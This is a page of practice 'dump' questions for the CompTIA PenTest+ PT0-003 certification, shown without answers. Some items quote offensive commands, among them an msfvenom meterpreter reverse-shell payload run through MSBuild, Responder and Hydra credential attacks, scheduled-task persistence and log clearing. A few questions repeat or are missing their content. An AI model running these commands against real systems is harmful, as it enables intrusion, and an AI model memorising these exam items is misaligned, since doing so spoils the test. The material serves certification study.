Winter Special - Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: top65certs

Free and Premium CompTIA PT0-003 Dumps Questions Answers

Page: 1 / 10
Total 131 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stability. Which of the following commands should the tester try first?

Options:

A.

responder -I eth0 john responder_output.txt

B.

hydra -L administrator -P /path/to/pwlist.txt -t 100 rdp://

C.

msf > use msf > set msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > run

D.

python3 ./buffer_overflow_with_shellcode.py 445

Buy Now
Question 2

Which of the following components should a penetration tester include in an assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Question 3

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Host | CVSS | EPSS

Target 1 | 4 | 0.6

Target 2 | 2 | 0.3

Target 3 | 1 | 0.6

Target 4 | 4.5 | 0.4

Options:

A.

Target 1: CVSS Score = 4 and EPSS Score = 0.6

B.

Target 2: CVSS Score = 2 and EPSS Score = 0.3

C.

Target 3: CVSS Score = 1 and EPSS Score = 0.6

D.

Target 4: CVSS Score = 4.5 and EPSS Score = 0.4

Question 4

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Question 5

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

Options:

A.

Phishing

B.

Tailgating

C.

Whaling

D.

Spear phishing

Question 6

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client. The team crafts a Bash script for this task. However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?

Options:

A.

resolvconf $i

B.

rndc $i

C.

systemd-resolve $i

D.

host $i

Question 7

A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings, and high-level statements. Which of the following sections of the report would most likely contain this information?

Options:

A.

Quality control

B.

Methodology

C.

Executive summary

D.

Risk scoring

Question 8

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?

Options:

A.

Testing window

B.

Terms of service

C.

Authorization letter

D.

Shared responsibilities

Question 9

During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?

Options:

A.

Nikto

B.

Burp Suite

C.

smbclient

D.

theHarvester

Question 10

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Options:

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Question 11

A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Question 12

Which of the following components should a penetration tester include in an assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Question 13

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

Options:

A.

Browser Exploitation Framework

B.

Maltego

C.

Metasploit

D.

theHarvester

Question 14

After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:\users\mgranite\schtasks /query

2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

Which of the following best explains the team's objective?

Options:

A.

To enumerate current users

B.

To determine the users' permissions

C.

To view scheduled processes

D.

To create persistence in the network

Question 15

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

Options:

A.

Clear the Windows event logs.

B.

Modify the system time.

C.

Alter the log permissions.

D.

Reduce the log retention settings.

Question 16

In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

Options:

A.

IAM

B.

Block storage

C.

Virtual private cloud

D.

Metadata services

Question 17

A penetration tester wants to use the following Bash script to identify active servers on a network:

1 network_addr="192.168.1"

2 for h in {1..254}; do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo "Host $h is up"

6 else

7 echo "Host $h is down"

8 fi

9 done

Which of the following should the tester do to modify the script?

Options:

A.

Change the condition on line 4.

B.

Add 2>&1 at the end of line 3.

C.

Use seq on the loop on line 2.

D.

Replace $h with ${h} on line 3.

Question 18

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

Options:

A.

Smishing

B.

Impersonation

C.

Tailgating

D.

Whaling

Question 19

While conducting a reconnaissance activity, a penetration tester extracts the following information:

Emails: - admin@acme.com - sales@acme.com - support@acme.com

Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?

Options:

A.

Unauthorized access to the network

B.

Exposure of sensitive servers to the internet

C.

Likelihood of SQL injection attacks

D.

Indication of a data breach in the company

Question 20

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

Options:

A.

regsvr32 /s /n /u C:\evil.xml

B.

MSBuild.exe C:\evil.xml

C.

mshta.exe C:\evil.xml

D.

AppInstaller.exe C:\evil.xml

Question 21

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

Options:

A.

IAST

B.

SBOM

C.

DAST

D.

SAST

Question 22

A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output:

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl

200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python

Which of the following actions should the tester take to get the scans to work properly?

Options:

A.

Modify the scanner to slow down the scan.

B.

Change the source IP with a VPN.

C.

Modify the scanner to only use HTTP GET requests.

D.

Modify the scanner user agent.

Question 23

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Which of the following targets should the tester select next?

Options:

A.

fileserver

B.

hrdatabase

C.

legaldatabase

D.

financesite

Question 24

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

Options:

A.

Service discovery

B.

OS fingerprinting

C.

Host discovery

D.

DNS enumeration

Question 25

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?

Options:

A.

Kiosk escape

B.

Arbitrary code execution

C.

Process hollowing

D.

Library injection

Question 26

In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

Options:

A.

IAM

B.

Block storage

C.

Virtual private cloud

D.

Metadata services

Question 27

A penetration tester needs to confirm the version number of a client's web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Question 28

A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

Options:

A.

ProxyChains

B.

Netcat

C.

PowerShell ISE

D.

Process IDs

Question 29

A tester runs an Nmap scan against a Windows server and receives the following results:

Nmap scan report for win_dns.local (10.0.0.5)

Host is up (0.014s latency)

Port State Service

53/tcp open domain

161/tcp open snmp

445/tcp open smb-ds

3389/tcp open rdp

Which of the following TCP ports should be prioritized for using hash-based relays?

Options:

A.

53

B.

161

C.

445

D.

3389

Question 30

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path("urls.txt").read_text().split("\n"):

5 response = requests.get(url)

6 if response.status == 401:

7 print("URL accessible")

Which of the following changes is required?

Options:

A.

The condition on line 6

B.

The method on line 5

C.

The import on line 1

D.

The delimiter in line 3

Question 31

A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?

Options:

A.

BeEF

B.

John the Ripper

C.

ZAP

D.

Evilginx

Question 32

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

Options:

A.

certutil.exe

B.

bitsadmin.exe

C.

msconfig.exe

D.

netsh.exe

Question 33

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 34

During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?

Options:

A.

Dnsenum

B.

Nmap

C.

Netcat

D.

Wireshark

Question 35

Which of the following post-exploitation activities allows a penetration tester to maintain persistent access in a compromised system?

Options:

A.

Creating registry keys

B.

Installing a bind shell

C.

Executing a process injection

D.

Setting up a reverse SSH connection

Question 36

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Options:

A.

Articulation of cause

B.

Articulation of impact

C.

Articulation of escalation

D.

Articulation of alignment

Question 37

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

Options:

A.

Preserving artifacts

B.

Reverting configuration changes

C.

Keeping chain of custody

D.

Exporting credential data

Question 38

During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:

    Weaker password settings than the company standard

    Systems without the company's endpoint security software installed

    Operating systems that were not updated by the patch management system

Which of the following recommendations should the penetration tester provide to address the root issue?

Options:

A.

Add all systems to the vulnerability management system.

B.

Implement a configuration management system.

C.

Deploy an endpoint detection and response system.

D.

Patch the out-of-date operating systems.

Question 39

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

PORT STATE SERVICE

22/tcp open ssh

25/tcp filtered smtp

111/tcp open rpcbind

2049/tcp open nfs

Based on the output, which of the following services provides the best target for launching an attack?

Options:

A.

Database

B.

Remote access

C.

Email

D.

File sharing

Page: 1 / 10
Total 131 questions